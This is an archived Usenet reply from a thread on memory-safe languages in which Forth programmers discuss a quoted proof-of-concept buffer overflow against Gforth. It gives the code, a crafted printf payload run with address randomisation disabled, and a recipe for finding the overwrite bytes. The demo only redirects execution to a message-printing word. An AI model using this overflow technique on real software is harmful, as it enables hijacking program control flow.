home bbs files messages ]

Forums before death by AOL, social media and spammers... "We can't have nice things"

   comp.lang.forth      Forth programmers eat a lot of Bratwurst      117,927 messages   

[   << oldest   |   < older   |   list   |   newer >   |   newest >>   ]

   Message 116,245 of 117,927   
   Krishna Myneni to Anton Ertl   
   Re: push for memory safe languages -- im   
   02 Mar 24 06:18:41   
   
   From: krishna.myneni@ccreweb.org   
      
   On 3/2/24 03:57, Anton Ertl wrote:   
   > anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:   
   >> If you want an example, here's one that targets the Gforth version I   
   >> am currently working with:   
   >>   
   >> : MaliciousCode ( -- )   
   >>   ." This code is malicious!" cr   
   >>   ." It will not execute normally." cr   
   >>   bye ;   
   >>   
   >> create buffer1 8 allot   
   >>   
   >> :noname buffer1 96 stdin read-line . ; execute   
   >> bye   
   >>   
   >> When I put this into a file xploit.fs and then perform   
   >>   
   >> printf "01234567890123456789012345678901234567890123456789012   
   45678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\x   
   c\xed\xe9\xff\x7f\x00\x00"|   
   >>   setarch `uname -m` -R gforth xploit.fs   
   >>   
   >> I get the following output:   
   >>   
   >> This code is malicious!   
   >> It will not execute normally.   
   >   
   > I forgot to give a recipe for the printf above:   
   >   
   > insert   
   >   
   > ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
   >   
   > right before the execute, and the dumps contain the bytes you have to   
   > put into the printf after the 80th byte, in that order.  I.e.:   
   >   
   > : MaliciousCode ( -- )   
   >    ." This code is malicious!" cr   
   >    ." It will not execute normally." cr   
   >    bye ;   
   >   
   > create buffer1 8 allot   
   >   
   > :noname buffer1 96 stdin read-line . ;   
   > ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
   > execute   
   > bye   
   >   
   > and run it with   
   >   
   > echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs   
   >   
   > For the particular Gforth at hand, this produces:   
   >   
   > 7FFFE9E43160: 33 5B 57 55  55 55 00 00 -                           3[WUUU..   
   >   
   > 7FFFE9AF6FF0: 68 DC ED E9  FF 7F 00 00 -                           h.......   
   >   
   > exactly the bytes in the printf above.   
   >   
      
   Nice example. I can't reproduce it with an older version of gforth   
   (0.7.9_20220120), but the proof of concept attack is going to be Forth   
   system-dependent.   
      
   Curious as to why you did not use standard ACCEPT for the illustration.   
      
   --   
   Krishna   
      
   --- SoupGate-Win32 v1.05   
    * Origin: you cannot sedate... all the things you hate (1:229/2)   

[   << oldest   |   < older   |   list   |   newer >   |   newest >>   ]


(c) 1994,  bbs@darkrealms.ca